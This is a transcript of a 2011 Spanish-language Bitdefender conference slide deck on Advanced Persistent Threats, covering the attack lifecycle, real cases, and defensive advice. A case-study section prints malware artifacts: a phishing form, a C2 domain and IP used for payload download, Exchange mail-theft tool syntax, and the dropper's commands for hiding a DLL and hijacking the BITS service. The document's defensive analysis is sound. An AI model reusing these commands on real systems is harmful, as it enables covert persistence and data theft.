Adavanced persistant threads

535 views

Published on

Charla impartida por Horatiu Bandoiu, de Bitdefender en el evento Asegúr@IT Camp 3, dicho evento tuvo lugar en El Escorial los días 21, 22 y 23 de octubre de 2011.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
535
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
14
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Adavanced persistant threads

  1. 1. ADVANCED PERSISTENT THREATS“Existen personas más inteligentes que tú, que tienen más recursos que tú, y que vienen a por tí. Buena suerte.” - Matt Olney (SourceFire) Horatiu Bandoiu Pedro Sánchez
  2. 2. HORATIU BANDOIU Whoami Trabajo:  Marketing – he aprendido hacer Powerpoints   Seguridad – Bitdefender – mas negocio que seguridad en aquellos tiempos  Seguridad – VAD especializado en seguridad de Rumania  Seguridad – Bitdefender Experiencia relevante: Estándares, buenas practicas, sistemas – ISO 27001 & similares Algunas implantaciones de infraestructuras de seguridad y servicios profesionales Interesado de: Psicología forense, steganografia, canales cubiertos, virtualización, sociología de la era Post PC etc.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 3
  3. 3. PEDRO SANCHEZ Whoami  He trabajado en importantes empresas como consultor especializado en Computer Forensics, Honeynets, detección de intrusiones, redes trampa y pen-testing. He implantado normas ISO 27001, CMMI (nivel 5) y diversas metodologías de seguridad.  Colaboro sobre seguridad y análisis forense informático con diversas organizaciones comerciales y con las fuerzas de seguridad del estado, especialmente con el Grupo de Delitos Telemáticos de la Guadia Civil y la Brigada de Investigación Tecnológica de la policia nacional. También he participado en las jornadas JWID/CWID organizadas por el ministerio de defensa, en donde obtuve la certificación nato secret. Actualmente soy miembro de la Spanish Honeynet Project y trabajo de consultor asociado para Bitdefender y Security Forensics en Google. Soy el autor del blog conexión InversaCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 4
  4. 4. ¿Que es un APT? (Advanced Persistent Threat) • Amenaza: te amenaza, pero hay un grado de intervención humana, coordinados en el ataque. Los criminales tienen un objetivo específico y están motivados, organizados y bien financiados. • Persistentes: los criminales dan prioridad a una tarea específica, en vez de obtener un beneficio económico inmediato. El ataque se lleva a cabo a través de un seguimiento e interacción continuos con el fin de alcanzar los objetivos definidos y que el mismo se mantenga en el tiempo. • Avanzada: los criminales utilizan tecnologías y técnicas de intrusión informática avanzadas. Aunque la componente mas usual del ataque es el malware. Los delincuentes pueden acceder y desarrollar instrumentos más avanzados cuando sea necesario. Además, se combinan las metodologías de múltiples ataques y herramientas a fin de alcanzar el objetivo.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 5
  5. 5. ¿Como son? Realidades: • Los ataques APT pueden romper la seguridad de una empresa aunque esta haya sido diseñada en seguridad desde el diseño por medio de muchos vectores:  Infección a través de malware en Internet (Drive-by-Download).  Ingreso de malware físicamente.  Explotación desde el exterior.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 6
  6. 6. ¿Como son? • El abuso de las empresas en el pobre control de cesión de "conexiones de confianza“ como las VPNs, es un ingrediente clave para muchos APT. • Los criminales a menudo suplantan las credenciales de los empleados secuestrados por malware. • Por lo tanto, cualquier organización o sitio remoto puede ser víctima de un APT y ser utilizado como un punto de recolección de información. Un requisito fundamental para APT es permanecer invisible durante todo el tiempo que sea posible.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 7
  7. 7. ¿Quienes son? (APT vs Hackers) • Denominados “atacantes”, no hackers. Son profesionales organizados, muchas veces financiados por estructuras estatales o organizaciones / empresas con mucho poder • Su motivación, técnicas y tenacidad son diferentes. • Aunque su motivación parezca familiar (robar datos), los ataques APT son diferentes...el TARGET es diferente • También establecen un medio para volver a la víctima, para robar datos adicionales y para permanecer ocultos en su red sin ser detectados por la víctimaCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 8
  8. 8. Objetivos del APT Políticos Económicos Técnicos Militares Los APTs con capaces de comprometer la seguridad de cualquier objetivo que se fijen. Las medidas de seguridad convencionales son en 95% de casos inútiles frente a estos ataques.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 9
  9. 9. Ciclo de despliegue del APT1.- Reconocimiento2.- Intrusión3.- Implantación, despliegue de herramientas y robo de identidades.4.- Robo de datos5.- Mantener la persistencia6.- (Desaparecer)Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 10
  10. 10. 1.- Reconocimiento Durante la fase de reconocimiento los atacantes identifican a las personas de interés en la organización. OBJETIVO: Presidentes, Directores, Directivos, Gerentes, Administradores de Sistema/ Seguridad (!!!), Ingenieros, hasta secretarias de dirección. Muchos de estos datos pueden obtenerse directamente de las web públicas. En otros casos puede obtenerse de los “metadatos” incluidos en documentos Office y PDF disponibles online o en los buscadores mas utilizados como Google y Bing. ¿Alguien conoce alguna FOCA?Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 11
  11. 11. 2.- IntrusiónEl mas utilizado es la técnica que combina ingeniería social conjuntamente con elcorreo electrónico, llamado “spear phishing”En este tipo de estafa el ciberdelincuente envía un correo electrónico a losempleados de una determinada empresa, suplantando la identidad de un directivou otro miembro de la misma.Los adjuntos suelen contener: Archivo con malware Archivo Microsoft Office con ejecución selectiva de Macros Exploit de Adobe Reader, etc.Cuando no son adjuntos, son enlaces a sitios que plantean el malware (como en elphishing tradicional). O es el Facebook, LinkedIn, Tuenti …Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 12
  12. 12. 3.- Implantación,despliegue y roboDurante la fase de establecer un acceso remoto por medio de conexión inversa‘,los atacantes intentan obtener las credenciales de administrador del dominio, paraelevar privilegios y moverse por distintas máquinas propiedad de la empresa,instalando a su vez otras herramientas de hacking o de malware controlado.El malware utilizado no suele ser detectado por los AV ni sistemas de detección deintrusos (IDS), y se instala normalmente con privilegios de nivel de sistema.La acción mas común es intentar conseguir credenciales de administrador local dela máquina, dado que las políticas de seguridad en muchas empresas suelen serrelajadas.Se intentan obtener credenciales de usuario de toda la empresaDespués se realizan sesiones NETBIOS con dichas credenciales para obteneracceso a las carpetas y ficheros de la red.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 13
  13. 13. 3.- Implantación,despliegue y roboSe crean usuarios ficticios en los sistemas más fáciles de compromiso comoservidores de bases de datos, de correo y control de aplicaciones.Se preparan los atacantes e instalan paneles de control para utilidades con objetode realizar diferentes tareas de administración:Instalar más puertas traseras, extraer emails de servidores, listar procesos enejecución, extraer ficheros y empaquetarles, establecer canales cubiertos.En el peor de los escenarios se crean rutas alternativas para salir hacia internet yse llega a controlar los routers y otros dispositivos de comunicaciones y seguridadcomo los cortafuegos.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 14
  14. 14. 4.- Robo de datosEl atacante extrae datos como emails, archivos adjuntos y otros ficheros desdeestaciones de trabajo y servidores de ficheros.La información se comprimen y se protege (p.ej. Archivos RAR segmentadosprotegidos con contraseña) en servidores intermedios antes de enviarla a unservidor que pertenece a la infraestructura de la red atacante (servidores C2, C&Co Command and Control). También se han visto casos en que se depositan engrandes contenedores de datos como MEGAUPLOAD y RAPIDSHARE.Los archivos comprimidos se eliminan de los servidores intermedios en la ultimafase para no dejar rastro.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 15
  15. 15. 5.- PersistenciaEn la fase de mantener persistencia el atacante responde a los intentos derespuesta al incidente de la víctima:- Estableciendo nuevos puntos de acceso a la red- Mejorando la sofisticación y actualizar el malware- Modificando código fuente de aplicaciones legitimas o repositorios donde seencuentran.- Borrando logs- Inhabilitando antivirus o haciendo que estos se comporten de forma anómalaCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 16
  16. 16. Casos reales de APTCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 17
  17. 17. Caso 1: Ataques sobre la Industria Petrolífera Americana US oil industry hit by cyberattacks: Was China involved? (Christian Science Monitor) - Iniciado en 2008 - Spear Phishing a empleados de nivel C - 2 años sin ser observado/respondido - Tenían medidas de seguridad de alto nivel SO WHAT?Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 18
  18. 18. CASO 2: CASO AURORA • Un ataque tipo phishing en Enero 2010 – oops, it happens again !!! • La investigación ha revelado no menos de 34 empresas afectadas, de Google e Yahoo hasta a empresas de seguridad como Symantec y Juniper, pero también fabricantes de tecnologias de defensa como Northrop Grumman. • Chinese Operation ??? El gobierno chino?Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 19
  19. 19. Aurora C&C Communication - El cargo estaba comunicando con el C&C en el puerto 443 (https). - El puerto de salida se elige aleatoriamente - Se estaba usando trafico encriptado - La estructura del paquete: - La parte de payload esta encriptada con una llave seleccionada con GetTickCount – cada nodo infectado tiene su propia llave - La llave se transmite en el packet header para ser recuperada facilmenteCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 20
  20. 20. CASO 3: STUXNET – EL CIBERARMA La Reina Esther: ‫אֶסְ תר‬ ֵּ Todos hablábamos sobre las vulnerabilidades de Industrial Control Systems Los vectores de ataque han cambiado: 1. Un USB Stick que contenía un malware increíblemente complejo 2. El payload buscaba su objetivo: (Siemens SIMATIC WinCC/Step 7 Controller software 3. El malware afectaba la interfaz de control y colección de datos de maquinas a centrifugar Uranio y SE ESCONDIA 4. Se puede actualizar hasta 24 de Junio 2012 (los francmasones??)Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 21
  21. 21. CASO 2: DRONES WAR• Drone = un pequeño dispositivo usado en operaciones militares, en nuestro caso un avión (UAV) que es controlado a distancia por un piloto que, lógicamente, queda resguardado en su base y fuera de todo peligro.• Creech Aerial Base – keyloggers y comunicaciones “curiosas” – Le gusta Mafia Wars?• Malintencionado o accidente?Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 22
  22. 22. CASO 3: DuQu – Stuxnet 2Copyright@bitdefender 2011 / www.bitdefender.es Fuente: Symantec 10/27/2011 • 23
  23. 23. Anatomía de un APTCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 24
  24. 24. ANATOMIA DE UN CASO DE APT Como funciona:Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 25
  25. 25. ANATOMIA DE UN CASO DE APT Paso 1. Reconocimiento Entidad de auditoria financiera Tiene clientes importantes Están usando portátiles para analizar y transferir datos – propios y de clientes Muy móviles, poca seguridad para los trabajadores en remotoCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 26
  26. 26. ANATOMIA DE UN CASO DE APT Paso 2. Spear PhishingCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 27
  27. 27. ANATOMIA DE UN CASO DE APT Paso 2. Spear Phishing form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.lsbu.ac.uk/php4- cgiwrap/hscweb/cm/login.php“ method=3D"post" target=3D"_blank" onsubmit=3D"alert("This form has been disabled."); return false">{div name=3D"gaia_loginbox"> -------------------------------- input name=3D"AGALX" value=3D"NIE34iN5DAAYY" type=3D"hidden">=20 input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com" type=3D"text">{/td>Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 28
  28. 28. ANATOMIA DE UN CASO DE APT Paso 3. El malware - Dirección de correo fake en Gmail - Llegamos al “bicho”Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 29
  29. 29. ANATOMIA DE UN CASO DE APT Paso 3. El malware - Ejecutamos el bicho en maquina virtual y le damos tiempo para manifestarse - El fichero docx da un error clásico de RuntimeCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 30
  30. 30. ANATOMIA DE UN CASO DE APTPaso 3. El malware- Mientras tanto, sorpresa: - se ha lanzado un proceso “file.exe” y - se ha creado en los temporales un html en la rutaC:Documents and SettingsKLYLocal SettingsTempmhzksbnz.html)Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 31
  31. 31. ANATOMIA DE UN CASO DE APT Paso 3. El malware El malware registra los inputs del teclado KeyloggerCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 32
  32. 32. ANATOMIA DE UN CASO DE APT Paso 3. El malware El proceso file.exe crea también un fichero UpdaterInfo.dat‘ + diversas librerías .dll y otros diversos ficheros html. (se esta preparando para el siguiente paso)Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 33
  33. 33. ANATOMIA DE UN CASO DE APT Paso 4. Comunicamos ? El proceso lanza una conexión a Internet y por HTTP se conecta al siguiente dominio tomitomi.cn - 195.248.234.157 (registrado a nombre de Zhejiang 5 Red Interior – una empresa de diseño grafico) y procede a la descarga de un fichero comprimido de nombre gamer.zip‘Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 34
  34. 34. ANATOMIA DE UN CASO DE APT Paso 5. Silencio! Estamos trabajando! • El fichero se almacena en la carpeta temp y contiene los siguientes ficheros: – iam.exe – iam.dll – m.exe – r.exe – y.exe – sas.batCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 35
  35. 35. ANATOMIA DE UN CASO DE APTPaso 5. Silencio! Estamos trabajando!• El fichero m.exe es una variación de getmail y sirve para recuperar mensajes de correo electrónico de servidores ExchangeEjemplo:%s -s:sn-server1.mailserver.com -u:exuser4 -t:2011-7-25-14 -o:c:winnttemp%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath•Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 36
  36. 36. ANATOMIA DE UN CASO DE APTPaso 5. Silencio! Estamos trabajando!• El fichero r.exe es el rar.exe de Winrar y sirve probablemente para la compresion de los datos robados• El rootkit y.exe crea el fichero C:WINDOWSsystem32prxy.dll y un archivo por lotes de nombre sas.bat• A continuación se crea un proceso basando en cmd.exe con el siguiente comando cmd /c rundll32 prxy.dll,RundllInstall y con los posteriores comandos:Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 37
  37. 37. cmd /c attrib +h +s prxy.dll cmd /c net start bits cmd /c net stop bits cmd /c rundll32 prxy.dll,RundllInstall prxy.dll cmd /c sas.bat del %s del %s /as ping 127.0.0.1 -n 3 del sas.batCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 38
  38. 38. PRXY.DLL Creado por Y.EXE reemplaza el servicio legitimo BITs de Windows ubicado en la siguiente rama del registro: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServi cesBITSParameters Facilita la descarga de software sin que la mayoría de los antivirus o cortafuegos hagan algo al respecto, dado que al tratarse de un servicio legitimo se permiten la entrada y salida de trafico hacia Internet.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 39
  39. 39. SAS.BAT Como su nombre indica es un fichero de proceso por lotes y quizás este es el mas sorprendente de los ficheros analizados por el contenido:Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 40
  40. 40. Si descomprimimos el archivo ~WRD0100.tmp nosencontramos con lo siguiente:Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 41
  41. 41. CONCLUSION ? • Aun estamos investigando pero parece que alguien se prepara para hacer una grande implantación en la consultora y sus clientes. O lo ha hecho ya?Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 42
  42. 42. Conclusiones APT  APT no es un problema exclusivo de otros ni de estado, militar o de ciertas industrias. Todos somos susceptibles de ser atacados  No existe un objetivo pequeño, ni poco defendido. Interesa ya no lo económico, pero lo interesante y privado  El enemigo es capaz de evadir antivirus, IDS y los equipos de respuesta a incidentes no están debidamente equipados.  De todo el malware analizado en casos conocido de APT, sólo el 24% fue detectado por software antimalware.  Evitan la detección utilizando puertos TCP/IP comunes, inyección en procesos comunes, y persistencia mediante servicios de Windows. También se instala en modo privilegiado (si lo puede conseguir).  Sólo inician conexiones “salientes”, casi nunca se inician en modo “escucha” de conexiones entrantes.  En sistemas virtualizados o en el cloud muchas veces la seguridad se relega a mecanismos tradicionales y esto no es suficienteCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 43
  43. 43. Conclusiones APT ¿Como arreglo esto? Debes ser capaz de ver y buscar signos de intrusiones más allá del antivirus y del IDS:  Empieza a utilizar la palabra, concientizar los usuarios e implantar mecanismos de Monitorizar, por lo tanto: Información a nivel de RED Información a nivel de HOST Procesos SIEM?  Debes mirar examinar el contenido del tráfico de red, ficheros, correos e incluso la memoria RAM de los sistemas, ¿Cuanto hace que no revisas los procesos de tu granja virtualizada?  Empieza a distinguir entre OK y NOK o falso positivo o falso negativo. No delegues esta función, hazlo tú.Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 44
  44. 44. ¿Como arreglo esto? 0010 B8 00 00 00 00 00 00 00 40 00 00 0010 B8 00 00 00 00 00 00 00 40 00 00 0010 B8 00 00 00 00 00 00 00 40 00 00 0020 00 00 00 00 00 00 00 00 00 00 00 0020 00 00 00 00 00 00 00 00 00 00 00 0020 00 00 00 00 00 00 00 00 00 00 00 0030 00 00 00 00 00 00 00 D0 00 00 4C 0030 00 00 00 00 00 00 00 D0 00 00 4C 0030 00 00 00 00 00 00 00 D0 00 00 4C 0040 OE IF EA OE 09 CD 21 B8 01 4C CD 0040 OE IF EA OE 09 CD 21 B8 01 4C CD 0040 OE IF EA OE 09 CD 21 B8 01 4C CD Detección IncrementadaCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 45
  45. 45. Conclusiones APT ¿Como arreglo esto?  No peleamos contra máquinas ni código, lo hacemos contra inteligencia humana y de buena calidad  Necesitamos herramientas que se integren con la forma de pensar, los métodos y las habilidades de los responsables de defender a las organizaciones, es decir una nueva figura como los analistas de seguridad.  Necesitamos saber lo que queremos proteger y protegerlo adecuadamente.  Los AV tradicionales no sirven. Que tal de nuevas tecnologías? THINK DIFFERENTLY !!! No puedes protegerlo todo, protege lo que tiene mas valorCopyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 46
  46. 46. Conclusiones APT Seguridad en la era PostPC  Usamos cada día mas y más dispositivos nuevos que no tienen seguridad por diseño  Hacemos mas y mas las cosas “en la nube”  Nos movemos mucho, junto con nuestros “boxes”  Estamos virtualizando casi todo Pero las cosas básicas de seguridad no han cambiado. ADAPT! STAY AWARE!Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 47
  47. 47. MuchasGRACIAS!

×